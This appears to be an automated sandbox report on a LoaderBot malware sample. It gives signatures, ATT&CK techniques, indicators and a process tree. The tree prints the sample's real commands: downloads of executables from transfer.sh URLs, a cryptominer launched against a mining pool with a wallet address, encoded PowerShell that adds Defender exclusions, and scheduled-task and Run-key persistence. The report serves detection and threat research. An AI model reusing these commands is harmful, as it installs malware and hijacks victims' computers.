loaderbot | ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c

Analysis

max time kernel
151s
max time network
153s
platform
windows10_x64
resource
win10-en-20211208
submitted
05/01/2022, 14:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c.exe
Size

369KB
MD5

4474e6fdd0c681c2b133e850626a4cbf
SHA1

943216049e46b9725e33d9268c0f733b1a6c9f9b
SHA256

ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c
SHA512

6a4f7204d53c13091cbc2eedecc48688047b360fd00686a403f51032120544a51a5494d5541f450d5c9e392b6f0419ce27676fb4f9fb13d3b1aaae752214e51a

Score

10^/10

loaderbot evasion loader miner persistence spyware trojan upx vmprotect

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3960 created 1180	3960	WerFault.exe	78

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

LoaderBot executable 3 IoCs

resource	yara_rule
behavioral1/memory/1232-141-0x0000000000220000-0x000000000067B000-memory.dmp	loaderbot
behavioral1/memory/1232-145-0x0000000000220000-0x000000000067B000-memory.dmp	loaderbot
behavioral1/memory/1232-147-0x0000000000220000-0x000000000067B000-memory.dmp	loaderbot

Blocklisted process makes network request 1 IoCs

flow	pid	Process
9	668	WScript.exe

Downloads MZ/PE file

Executes dropped EXE 10 IoCs

pid	Process
828	extd.exe
3048	setup_c.exe
2292	extd.exe
1232	setup_m.exe
316	extd.exe
1180	setup_s.exe
1080	extd.exe
1660	Driver.exe
708	build.exe
2292	services.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000500000001ab2d-120.dat	upx
behavioral1/files/0x000500000001ab2d-121.dat	upx
behavioral1/files/0x000500000001ab2d-127.dat	upx
behavioral1/files/0x000500000001ab2d-140.dat	upx
behavioral1/files/0x000500000001ab2d-163.dat	upx

VMProtect packed file 4 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x000500000001ab61-535.dat	vmprotect
behavioral1/files/0x000500000001ab61-534.dat	vmprotect
behavioral1/files/0x000600000001ab65-642.dat	vmprotect
behavioral1/files/0x000600000001ab65-643.dat	vmprotect

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup_s.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup_s.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	setup_m.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe"	setup_c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\setup_m.exe"	setup_m.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup_s.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3048	setup_c.exe
1232	setup_m.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1180 set thread context of 2428	1180	setup_s.exe	79

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3960	1180	WerFault.exe	78

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1760	schtasks.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings	cmd.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	9	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3048	setup_c.exe
3048	setup_c.exe
1232	setup_m.exe
1232	setup_m.exe
3960	WerFault.exe
3960	WerFault.exe
3960	WerFault.exe
3960	WerFault.exe
3960	WerFault.exe
3960	WerFault.exe
3960	WerFault.exe
3960	WerFault.exe
3960	WerFault.exe
3960	WerFault.exe
3960	WerFault.exe
3960	WerFault.exe
3960	WerFault.exe
3960	WerFault.exe
2428	AppLaunch.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe
1232	setup_m.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
636	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3048	setup_c.exe
Token: SeDebugPrivilege	1232	setup_m.exe
Token: SeRestorePrivilege	3960	WerFault.exe
Token: SeBackupPrivilege	3960	WerFault.exe
Token: SeDebugPrivilege	3960	WerFault.exe
Token: SeDebugPrivilege	2428	AppLaunch.exe
Token: SeLockMemoryPrivilege	1660	Driver.exe
Token: SeLockMemoryPrivilege	1660	Driver.exe
Token: SeDebugPrivilege	1240	powershell.exe
Token: SeIncreaseQuotaPrivilege	1240	powershell.exe
Token: SeSecurityPrivilege	1240	powershell.exe
Token: SeTakeOwnershipPrivilege	1240	powershell.exe
Token: SeLoadDriverPrivilege	1240	powershell.exe
Token: SeSystemProfilePrivilege	1240	powershell.exe
Token: SeSystemtimePrivilege	1240	powershell.exe
Token: SeProfSingleProcessPrivilege	1240	powershell.exe
Token: SeIncBasePriorityPrivilege	1240	powershell.exe
Token: SeCreatePagefilePrivilege	1240	powershell.exe
Token: SeBackupPrivilege	1240	powershell.exe
Token: SeRestorePrivilege	1240	powershell.exe
Token: SeShutdownPrivilege	1240	powershell.exe
Token: SeDebugPrivilege	1240	powershell.exe
Token: SeSystemEnvironmentPrivilege	1240	powershell.exe
Token: SeRemoteShutdownPrivilege	1240	powershell.exe
Token: SeUndockPrivilege	1240	powershell.exe
Token: SeManageVolumePrivilege	1240	powershell.exe
Token: 33	1240	powershell.exe
Token: 34	1240	powershell.exe
Token: 35	1240	powershell.exe
Token: 36	1240	powershell.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeIncreaseQuotaPrivilege	2240	powershell.exe
Token: SeSecurityPrivilege	2240	powershell.exe
Token: SeTakeOwnershipPrivilege	2240	powershell.exe
Token: SeLoadDriverPrivilege	2240	powershell.exe
Token: SeSystemProfilePrivilege	2240	powershell.exe
Token: SeSystemtimePrivilege	2240	powershell.exe
Token: SeProfSingleProcessPrivilege	2240	powershell.exe
Token: SeIncBasePriorityPrivilege	2240	powershell.exe
Token: SeCreatePagefilePrivilege	2240	powershell.exe
Token: SeBackupPrivilege	2240	powershell.exe
Token: SeRestorePrivilege	2240	powershell.exe
Token: SeShutdownPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeSystemEnvironmentPrivilege	2240	powershell.exe
Token: SeRemoteShutdownPrivilege	2240	powershell.exe
Token: SeUndockPrivilege	2240	powershell.exe
Token: SeManageVolumePrivilege	2240	powershell.exe
Token: 33	2240	powershell.exe
Token: 34	2240	powershell.exe
Token: 35	2240	powershell.exe
Token: 36	2240	powershell.exe
Token: SeDebugPrivilege	3120	powershell.exe
Token: SeIncreaseQuotaPrivilege	3120	powershell.exe
Token: SeSecurityPrivilege	3120	powershell.exe
Token: SeTakeOwnershipPrivilege	3120	powershell.exe
Token: SeLoadDriverPrivilege	3120	powershell.exe
Token: SeSystemProfilePrivilege	3120	powershell.exe
Token: SeSystemtimePrivilege	3120	powershell.exe
Token: SeProfSingleProcessPrivilege	3120	powershell.exe
Token: SeIncBasePriorityPrivilege	3120	powershell.exe
Token: SeCreatePagefilePrivilege	3120	powershell.exe
Token: SeBackupPrivilege	3120	powershell.exe
Token: SeRestorePrivilege	3120	powershell.exe

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 2520 wrote to memory of 2300	2520	ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c.exe	68
PID 2520 wrote to memory of 2300	2520	ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c.exe	68
PID 2300 wrote to memory of 668	2300	cmd.exe	71
PID 2300 wrote to memory of 668	2300	cmd.exe	71
PID 2300 wrote to memory of 828	2300	cmd.exe	72
PID 2300 wrote to memory of 828	2300	cmd.exe	72
PID 2300 wrote to memory of 828	2300	cmd.exe	72
PID 2300 wrote to memory of 3048	2300	cmd.exe	74
PID 2300 wrote to memory of 3048	2300	cmd.exe	74
PID 2300 wrote to memory of 3048	2300	cmd.exe	74
PID 2300 wrote to memory of 2292	2300	cmd.exe	75
PID 2300 wrote to memory of 2292	2300	cmd.exe	75
PID 2300 wrote to memory of 2292	2300	cmd.exe	75
PID 2300 wrote to memory of 1232	2300	cmd.exe	76
PID 2300 wrote to memory of 1232	2300	cmd.exe	76
PID 2300 wrote to memory of 1232	2300	cmd.exe	76
PID 2300 wrote to memory of 316	2300	cmd.exe	77
PID 2300 wrote to memory of 316	2300	cmd.exe	77
PID 2300 wrote to memory of 316	2300	cmd.exe	77
PID 2300 wrote to memory of 1180	2300	cmd.exe	78
PID 2300 wrote to memory of 1180	2300	cmd.exe	78
PID 2300 wrote to memory of 1180	2300	cmd.exe	78
PID 2300 wrote to memory of 1080	2300	cmd.exe	80
PID 2300 wrote to memory of 1080	2300	cmd.exe	80
PID 2300 wrote to memory of 1080	2300	cmd.exe	80
PID 1180 wrote to memory of 2428	1180	setup_s.exe	79
PID 1180 wrote to memory of 2428	1180	setup_s.exe	79
PID 1180 wrote to memory of 2428	1180	setup_s.exe	79
PID 1180 wrote to memory of 2428	1180	setup_s.exe	79
PID 1180 wrote to memory of 2428	1180	setup_s.exe	79
PID 1232 wrote to memory of 1660	1232	setup_m.exe	84
PID 1232 wrote to memory of 1660	1232	setup_m.exe	84
PID 2428 wrote to memory of 708	2428	AppLaunch.exe	86
PID 2428 wrote to memory of 708	2428	AppLaunch.exe	86
PID 708 wrote to memory of 1156	708	build.exe	87
PID 708 wrote to memory of 1156	708	build.exe	87
PID 1156 wrote to memory of 1240	1156	cmd.exe	89
PID 1156 wrote to memory of 1240	1156	cmd.exe	89
PID 1156 wrote to memory of 2240	1156	cmd.exe	91
PID 1156 wrote to memory of 2240	1156	cmd.exe	91
PID 708 wrote to memory of 2496	708	build.exe	92
PID 708 wrote to memory of 2496	708	build.exe	92
PID 2496 wrote to memory of 1760	2496	cmd.exe	94
PID 2496 wrote to memory of 1760	2496	cmd.exe	94
PID 708 wrote to memory of 3188	708	build.exe	97
PID 708 wrote to memory of 3188	708	build.exe	97
PID 3188 wrote to memory of 2292	3188	cmd.exe	99
PID 3188 wrote to memory of 2292	3188	cmd.exe	99
PID 2292 wrote to memory of 680	2292	services.exe	100
PID 2292 wrote to memory of 680	2292	services.exe	100
PID 680 wrote to memory of 3120	680	cmd.exe	102
PID 680 wrote to memory of 3120	680	cmd.exe	102
PID 680 wrote to memory of 1360	680	cmd.exe	103
PID 680 wrote to memory of 1360	680	cmd.exe	103

C:\Users\Admin\AppData\Local\Temp\ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c.exe
"C:\Users\Admin\AppData\Local\Temp\ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2520
- C:\Windows\System32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\C873.bat C:\Users\Admin\AppData\Local\Temp\ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\17064\123.vbs"
    3⤵
    - Blocklisted process makes network request
    PID:668
- - C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe "/download" "https://transfer.sh/get/W6Ih4d/1.exe" "setup_c.exe" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:828
- - C:\Users\Admin\AppData\Local\Temp\17064\setup_c.exe
    setup_c.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3048
- - C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe "/download" "https://transfer.sh/get/An6EhV/2.exe" "setup_m.exe" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:2292
- - C:\Users\Admin\AppData\Local\Temp\17064\setup_m.exe
    setup_m.exe
    3⤵
    - Executes dropped EXE
    - Drops startup file
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1232
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1660
- - C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe "/download" "https://transfer.sh/get/hkrVHT/3.exe" "setup_s.exe" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:316
- - C:\Users\Admin\AppData\Local\Temp\17064\setup_s.exe
    setup_s.exe
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:1180
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2428
    - - C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:708
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2240
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2496
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:1760
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3188
        
        C:\Users\Admin\AppData\Roaming\Microsoft\services.exe
        
        C:\Users\Admin\AppData\Roaming\Microsoft\services.exe
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2292
        
        C:\Windows\system32\cmd.exe
        
        "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:680
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
        9⤵
        
        PID:1360
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 548
      4⤵
      Suspicious use of NtCreateProcessExOtherParentProcess
      Program crash
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3960
- - C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe "" "" "" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:1080

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1180-215-0x0000000002400000-0x0000000002401000-memory.dmp

Filesize
4KB

Download
memory/1180-202-0x0000000002690000-0x0000000002691000-memory.dmp

Filesize
4KB

Download
memory/1180-226-0x00000000024C0000-0x00000000024C1000-memory.dmp

Filesize
4KB

Download
memory/1180-225-0x0000000002870000-0x0000000002871000-memory.dmp

Filesize
4KB

Download
memory/1180-224-0x0000000002400000-0x0000000002401000-memory.dmp

Filesize
4KB

Download
memory/1180-222-0x0000000002880000-0x0000000002881000-memory.dmp

Filesize
4KB

Download
memory/1180-223-0x0000000002400000-0x0000000002401000-memory.dmp

Filesize
4KB

Download
memory/1180-221-0x0000000002810000-0x0000000002811000-memory.dmp

Filesize
4KB

Download
memory/1180-220-0x0000000002820000-0x0000000002821000-memory.dmp

Filesize
4KB

Download
memory/1180-218-0x00000000027F0000-0x00000000027F1000-memory.dmp

Filesize
4KB

Download
memory/1180-157-0x0000000000400000-0x00000000006F6000-memory.dmp

Filesize
3.0MB

Download
memory/1180-158-0x0000000000400000-0x00000000006F6000-memory.dmp

Filesize
3.0MB

Download
memory/1180-219-0x0000000002860000-0x0000000002861000-memory.dmp

Filesize
4KB

Download
memory/1180-217-0x0000000002840000-0x0000000002841000-memory.dmp

Filesize
4KB

Download
memory/1180-216-0x0000000002830000-0x0000000002831000-memory.dmp

Filesize
4KB

Download
memory/1180-214-0x0000000003460000-0x0000000003461000-memory.dmp

Filesize
4KB

Download
memory/1180-188-0x0000000003460000-0x0000000003461000-memory.dmp

Filesize
4KB

Download
memory/1180-167-0x0000000000870000-0x00000000008D0000-memory.dmp

Filesize
384KB

Download
memory/1180-191-0x0000000002470000-0x0000000002471000-memory.dmp

Filesize
4KB

Download
memory/1180-212-0x0000000003460000-0x0000000003461000-memory.dmp

Filesize
4KB

Download
memory/1180-210-0x0000000003460000-0x0000000003461000-memory.dmp

Filesize
4KB

Download
memory/1180-176-0x00000000027B0000-0x00000000027B1000-memory.dmp

Filesize
4KB

Download
memory/1180-211-0x0000000003460000-0x0000000003461000-memory.dmp

Filesize
4KB

Download
memory/1180-208-0x0000000002720000-0x0000000002721000-memory.dmp

Filesize
4KB

Download
memory/1180-181-0x0000000002760000-0x0000000002761000-memory.dmp

Filesize
4KB

Download
memory/1180-182-0x00000000027D0000-0x00000000027D1000-memory.dmp

Filesize
4KB

Download
memory/1180-183-0x00000000027A0000-0x00000000027A1000-memory.dmp

Filesize
4KB

Download
memory/1180-209-0x0000000003460000-0x0000000003461000-memory.dmp

Filesize
4KB

Download
memory/1180-178-0x0000000002770000-0x0000000002771000-memory.dmp

Filesize
4KB

Download
memory/1180-174-0x0000000002740000-0x0000000002741000-memory.dmp

Filesize
4KB

Download
memory/1180-172-0x0000000002790000-0x0000000002791000-memory.dmp

Filesize
4KB

Download
memory/1180-169-0x0000000002780000-0x0000000002781000-memory.dmp

Filesize
4KB

Download
memory/1180-207-0x00000000026B0000-0x00000000026B1000-memory.dmp

Filesize
4KB

Download
memory/1180-184-0x0000000003470000-0x0000000003471000-memory.dmp

Filesize
4KB

Download
memory/1180-186-0x0000000003460000-0x0000000003461000-memory.dmp

Filesize
4KB

Download
memory/1180-185-0x0000000003460000-0x0000000003461000-memory.dmp

Filesize
4KB

Download
memory/1180-187-0x0000000003460000-0x0000000003461000-memory.dmp

Filesize
4KB

Download
memory/1180-206-0x00000000026C0000-0x00000000026C1000-memory.dmp

Filesize
4KB

Download
memory/1180-190-0x0000000002460000-0x0000000002461000-memory.dmp

Filesize
4KB

Download
memory/1180-204-0x0000000002700000-0x0000000002701000-memory.dmp

Filesize
4KB

Download
memory/1180-193-0x0000000002410000-0x0000000002411000-memory.dmp

Filesize
4KB

Download
memory/1180-195-0x0000000002430000-0x0000000002431000-memory.dmp

Filesize
4KB

Download
memory/1180-196-0x0000000002490000-0x0000000002491000-memory.dmp

Filesize
4KB

Download
memory/1180-197-0x00000000024B0000-0x00000000024B1000-memory.dmp

Filesize
4KB

Download
memory/1180-198-0x0000000003460000-0x0000000003461000-memory.dmp

Filesize
4KB

Download
memory/1180-199-0x0000000003460000-0x0000000003461000-memory.dmp

Filesize
4KB

Download
memory/1180-200-0x00000000026D0000-0x00000000026D1000-memory.dmp

Filesize
4KB

Download
memory/1180-201-0x00000000026E0000-0x00000000026E1000-memory.dmp

Filesize
4KB

Download
memory/1232-141-0x0000000000220000-0x000000000067B000-memory.dmp

Filesize
4.4MB

Download
memory/1232-152-0x00000000754F0000-0x0000000076838000-memory.dmp

Filesize
19.3MB

Download
memory/1232-143-0x0000000074120000-0x00000000742E2000-memory.dmp

Filesize
1.8MB

Download
memory/1232-148-0x0000000070E60000-0x0000000070EE0000-memory.dmp

Filesize
512KB

Download
memory/1232-142-0x00000000007B0000-0x00000000007B1000-memory.dmp

Filesize
4KB

Download
memory/1232-145-0x0000000000220000-0x000000000067B000-memory.dmp

Filesize
4.4MB

Download
memory/1232-150-0x0000000076900000-0x0000000076E84000-memory.dmp

Filesize
5.5MB

Download
memory/1232-144-0x00000000750F0000-0x00000000751E1000-memory.dmp

Filesize
964KB

Download
memory/1232-151-0x0000000000750000-0x0000000000795000-memory.dmp

Filesize
276KB

Download
memory/1232-147-0x0000000000220000-0x000000000067B000-memory.dmp

Filesize
4.4MB

Download
memory/2428-175-0x0000000000040000-0x0000000000041000-memory.dmp

Filesize
4KB

Download
memory/2428-173-0x0000000000040000-0x0000000000041000-memory.dmp

Filesize
4KB

Download
memory/2428-194-0x00000000089D0000-0x0000000008ADA000-memory.dmp

Filesize
1.0MB

Download
memory/2428-213-0x0000000008900000-0x000000000894B000-memory.dmp

Filesize
300KB

Download
memory/2428-205-0x00000000088C0000-0x00000000088FE000-memory.dmp

Filesize
248KB

Download
memory/2428-192-0x0000000006410000-0x0000000006422000-memory.dmp

Filesize
72KB

Download
memory/2428-203-0x00000000088C0000-0x0000000008EC6000-memory.dmp

Filesize
6.0MB

Download
memory/2428-162-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2428-231-0x0000000000040000-0x0000000000041000-memory.dmp

Filesize
4KB

Download
memory/2428-179-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2428-180-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2428-177-0x0000000000040000-0x0000000000041000-memory.dmp

Filesize
4KB

Download
memory/2428-189-0x0000000008ED0000-0x00000000094D6000-memory.dmp

Filesize
6.0MB

Download
memory/3048-128-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/3048-170-0x0000000004EF0000-0x0000000004EFA000-memory.dmp

Filesize
40KB

Download
memory/3048-135-0x0000000070E60000-0x0000000070EE0000-memory.dmp

Filesize
512KB

Download
memory/3048-146-0x0000000076900000-0x0000000076E84000-memory.dmp

Filesize
5.5MB

Download
memory/3048-132-0x00000000750F0000-0x00000000751E1000-memory.dmp

Filesize
964KB

Download
memory/3048-131-0x0000000000E30000-0x0000000000E75000-memory.dmp

Filesize
276KB

Download
